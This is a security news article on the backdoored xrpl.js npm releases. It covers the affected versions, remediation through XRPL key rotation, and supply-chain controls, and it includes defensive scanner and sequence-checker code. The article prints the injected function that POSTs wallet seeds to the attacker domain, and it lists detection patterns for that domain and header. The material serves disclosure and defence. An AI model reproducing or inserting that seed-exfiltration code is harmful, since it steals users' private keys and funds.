Cybersecurity news without the noise

Backdoored xrpl.js NPM Package Steals Keys (CVE-2025-32965)

Security researchers at Aikido Security found that several versions of Ripple's official xrpl.js NPM package had been published with malicious code that exfiltrates wallet seeds, the secrets from which XRP Ledger private keys are derived, to an attacker-controlled server.1

The library sees over 140,000 weekly downloads, so the backdoored releases put XRP Ledger developers, and the users of any application that picked them up, at significant risk.1

The Compromised Packages

The supply chain attack affected the following versions of the xrpl.js library:

  • Version 4.2.1
  • Version 4.2.2
  • Version 4.2.3
  • Version 4.2.4
  • Version 2.14.2

The malicious versions were first published to npm on April 21, 2025, at 20:53 GMT by the npm user "mukulljangid". They had no counterpart on GitHub, where the latest tagged release was 4.2.0; an npm-only release that runs ahead of the source repository was the first sign that something was wrong.1

How the Backdoor Works

Aikido Security's threat-intelligence system, Aikido Intel, flagged suspicious code in the compromised versions. The backdoor is a short function named checkValidityOfSeed which, despite its name, validates nothing: it sends whatever seed it is handed to a remote host. In the later versions it was inserted directly into src/index.ts:1

const validSeeds = new Set<string>([])
export function checkValidityOfSeed(seed: string) {
  if (validSeeds.has(seed)) return
  validSeeds.add(seed)
  fetch("https://0x9c[.]xyz/xc", { method: 'POST', headers: { 'ad-referral': seed, } })
}

The function was called from the Wallet class constructor and from the methods that derive keys, so whenever an application created a wallet or imported a key, the seed was silently POSTed over HTTPS to the attacker's server in the ad-referral request header. The validSeeds set makes each seed leave only once, which keeps the outbound traffic down to one small request per key and makes it easy to miss in network logs.1

The attack evolved over several releases: in 4.2.1 and 4.2.2 only the built JavaScript shipped to npm had been edited by hand, while in 4.2.3 and 4.2.4 the backdoor was inserted directly into the TypeScript source, so it survived a normal build.

Impact and Remediation

Only the NPM distribution was affected; the GitHub repository was clean throughout. Anyone who installed a compromised version and passed a seed or secret through it should assume that the key material reached the attacker, who can then sign transactions and drain the corresponding accounts.2

The XRP Ledger Foundation responded quickly with clean releases 4.2.5 and 2.14.3. Upgrading, however, only stops further leakage; it does nothing for keys that were already sent out, so anyone who ran an affected version also has to rotate them.2

Users who used any of the affected versions should take the following actions immediately:2

  1. Treat every seed or private key that passed through an affected version as compromised and rotate it; generate the replacements with a clean release (4.2.5 or 2.14.3) or another trusted tool
  2. Move funds to accounts controlled by the newly generated keys
  3. For accounts whose master key may have leaked, assign a new regular key pair with a SetRegularKey transaction
  4. Then disable the master key (AccountSet with the asfDisableMaster flag); the order matters, because the ledger refuses to disable a master key while the account has neither a regular key nor a signer list, so step 3 must be validated before step 4 can succeed
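The key-rotation part of the procedure above, as an added example that is not code from the advisory or from xrpl.js itself. It builds the two XRPL transactions in the order they have to be submitted and replays the ledger's rule (an account with no regular key and no signer list cannot have its master key disabled, which rippled rejects with tecNO_ALTERNATIVE_KEY) over a proposed sequence before anything is sent. The account addresses are placeholders, and the account-state object is a simplified stand-in for what account_info would return.

```javascript
// Added example, not code from the advisory or from xrpl.js: build and
// sanity-check the two XRPL transactions that move an account off a
// compromised master key. The ledger rejects disabling the master key of an
// account that has neither a RegularKey nor a SignerList
// (tecNO_ALTERNATIVE_KEY), so SetRegularKey has to be validated first.

// AccountSet SetFlag value for asfDisableMaster in the XRP Ledger protocol.
const ASF_DISABLE_MASTER = 4;

// Returns the transactions in the order they must be submitted.
// `account` is the affected classic address; `newRegularKey` is the address
// of a key pair generated with a clean library. Both are placeholders below.
function buildKeyRotationTxs(account, newRegularKey) {
  return [
    { TransactionType: "SetRegularKey", Account: account, RegularKey: newRegularKey },
    { TransactionType: "AccountSet", Account: account, SetFlag: ASF_DISABLE_MASTER },
  ];
}

// Replays the ledger's rule over a proposed sequence. `accountState` is a
// simplified view of what account_info reports: { RegularKey, hasSignerList }
// (assumed shape for this example). Returns the index of the first
// transaction that would be rejected, or -1 if the sequence is sound.
function checkRotationSequence(txs, accountState = {}) {
  let hasRegularKey = Boolean(accountState.RegularKey);
  const hasSignerList = Boolean(accountState.hasSignerList);
  for (let i = 0; i < txs.length; i++) {
    const tx = txs[i];
    if (tx.TransactionType === "SetRegularKey") {
      // A SetRegularKey without a RegularKey field removes the regular key.
      hasRegularKey = Boolean(tx.RegularKey);
    } else if (tx.TransactionType === "AccountSet" && tx.SetFlag === ASF_DISABLE_MASTER) {
      if (!hasRegularKey && !hasSignerList) return i;
    }
  }
  return -1;
}

// Demo with placeholder addresses (not real accounts).
const rotation = buildKeyRotationTxs("rAffectedAccountPlaceholder", "rNewRegularKeyPlaceholder");
console.log("correct order, first rejected index:", checkRotationSequence(rotation));
console.log("reversed order, first rejected index:", checkRotationSequence([...rotation].reverse()));
```

With xrpl.js 2.x or later each transaction goes through client.autofill, wallet.sign and client.submitAndWait; wait for the SetRegularKey to be validated before submitting the AccountSet. Sign the first transaction with a wallet created by a clean release, and keep in mind that an attacker who already holds the seed can run the same two transactions first, which is why moving funds out comes before the key dance.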

Supply Chain Security Considerations

This incident shows the continuing risk of software supply chain attacks delivered through package registries such as NPM. The attackers:

  1. Released several versions in succession, refining the backdoor from hand-edited build output to a change in the TypeScript source
  2. Exfiltrated to a short, unremarkable domain (0x9c[.]xyz) over ordinary HTTPS, one small request per seed
  3. Picked a widely used cryptocurrency library, where a single leaked secret converts directly into money

Organizations using NPM packages in their development workflows should add controls such as:

  • Installing from a committed lockfile with npm ci rather than npm install, so a build cannot silently pick up a new release; a lockfile only freezes whatever was recorded in it, so one refreshed during the window of exposure would have pinned the backdoor just as faithfully
  • Verifying the integrity hashes recorded in the lockfile and the registry's package signatures (npm audit signatures); these catch tampering with a published tarball, not a malicious version published with valid credentials
  • Auditing the dependency tree regularly, including transitive copies of the same package nested under other modules
  • Comparing registry releases against the project's source repository: here the npm-only versions 4.2.1 to 4.2.4, with nothing beyond 4.2.0 tagged on GitHub, were the first tell
  • Not relying on install-time controls alone; this backdoor ran at runtime inside the application, so disabling lifecycle scripts would not have stopped it2
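A practical check that covers both the indicators from the analysis above and the lockfile controls just listed, as an added example that is not code from Aikido's report or from the xrpl.js project. It walks a package-lock.json (lockfileVersion 2 or 3, which carry a "packages" map keyed by install path) for every copy of xrpl, including nested transitive copies, flags the five backdoored versions plus entries with no integrity hash or a resolved URL outside the registry, and scans source text for the exfiltration domain, the injected function name and the ad-referral header. The sample lockfile and source snippet are constructed for this example.

```javascript
// Added example, not code from the advisory or from xrpl.js: scan a
// package-lock.json and installed source text for the xrpl.js backdoor.

// The five releases named in the advisory.
const COMPROMISED_XRPL_VERSIONS = new Set(["4.2.1", "4.2.2", "4.2.3", "4.2.4", "2.14.2"]);
const NPM_REGISTRY = "https://registry.npmjs.org/";

// Indicators of compromise from the published analysis: exfiltration domain,
// injected function name, and the header used to carry the seed.
const IOC_PATTERNS = [/0x9c\.xyz/, /checkValidityOfSeed/, /['"]ad-referral['"]/];

// Walks every entry in the lockfile "packages" map (keys look like
// "node_modules/xrpl" or "node_modules/foo/node_modules/xrpl") and returns
// one finding per xrpl entry that has a problem.
function findCompromisedXrpl(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path !== "node_modules/xrpl" && !path.endsWith("/node_modules/xrpl")) continue;
    const problems = [];
    if (COMPROMISED_XRPL_VERSIONS.has(entry.version)) problems.push("backdoored version");
    if (!entry.integrity) problems.push("no integrity hash");
    if (entry.resolved && !entry.resolved.startsWith(NPM_REGISTRY)) problems.push("resolved outside registry");
    if (problems.length > 0) findings.push({ path, version: entry.version, problems });
  }
  return findings;
}

// Returns the source form of every indicator pattern that matches the text,
// e.g. the contents of node_modules/xrpl/dist/npm/index.js.
function scanForIoc(text) {
  return IOC_PATTERNS.filter((re) => re.test(text)).map((re) => re.source);
}

// Constructed sample lockfile: a top-level backdoored copy and a clean nested one.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "sample-app", version: "1.0.0" },
    "node_modules/xrpl": {
      version: "4.2.3",
      resolved: "https://registry.npmjs.org/xrpl/-/xrpl-4.2.3.tgz",
      integrity: "sha512-constructedPlaceholderHash",
    },
    "node_modules/some-dep/node_modules/xrpl": {
      version: "4.2.5",
      resolved: "https://registry.npmjs.org/xrpl/-/xrpl-4.2.5.tgz",
      integrity: "sha512-constructedPlaceholderHash",
    },
  },
};

// Constructed sample source text resembling the injected function.
const SAMPLE_SOURCE = [
  "export function checkValidityOfSeed(seed) {",
  '  fetch("https://0x9c.xyz/xc", { method: "POST", headers: { "ad-referral": seed } })',
  "}",
].join("\n");

console.log("lockfile findings:", JSON.stringify(findCompromisedXrpl(SAMPLE_LOCK)));
console.log("indicators in source:", scanForIoc(SAMPLE_SOURCE));
```

The lockfile check is exact-match on purpose: range logic would hide the problem if a later compromised build reused a patch version. Lockfile version 1 files keep a "dependencies" tree instead of "packages" and need a different walker. Run the text scan over the installed dist files rather than the repository, since in 4.2.1 and 4.2.2 only the published JavaScript was modified.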

Final Thoughts

The xrpl.js backdoor incident represents a concerning evolution in supply chain attacks targeting the cryptocurrency sector. This was not an opportunistic attack but a sophisticated operation specifically designed to compromise high-value targets: cryptocurrency wallets holding potentially significant assets.1

The rapid identification and response by the security community and the XRP Ledger Foundation demonstrate the value of independent security monitoring systems and transparent security processes.

What makes this attack particularly noteworthy is that it targeted official package releases rather than relying on typosquatting or dependency confusion techniques seen in previous npm attacks.

The threat actors gained access to publishing credentials for a legitimate package with a large user base, highlighting the critical importance of securing not just code repositories but also package publishing pipelines.2

As software supply chain attacks continue to increase in sophistication, developers working in the cryptocurrency space must implement defense-in-depth strategies that assume compromise at some point in the dependency chain. This means implementing runtime protections, least-privilege principles, and comprehensive monitoring—especially when handling sensitive cryptographic operations.

Footnotes

  1. Aikido Security: XRP supply chain attack: Official NPM package infected with crypto stealing backdoor

  2. GitHub Advisory Database: Compromised xrpl.js versions 4.2.1, 4.2.2, 4.2.3, 4.2.4, and 2.14.2 (GHSA-33qr-m49q-rxfx)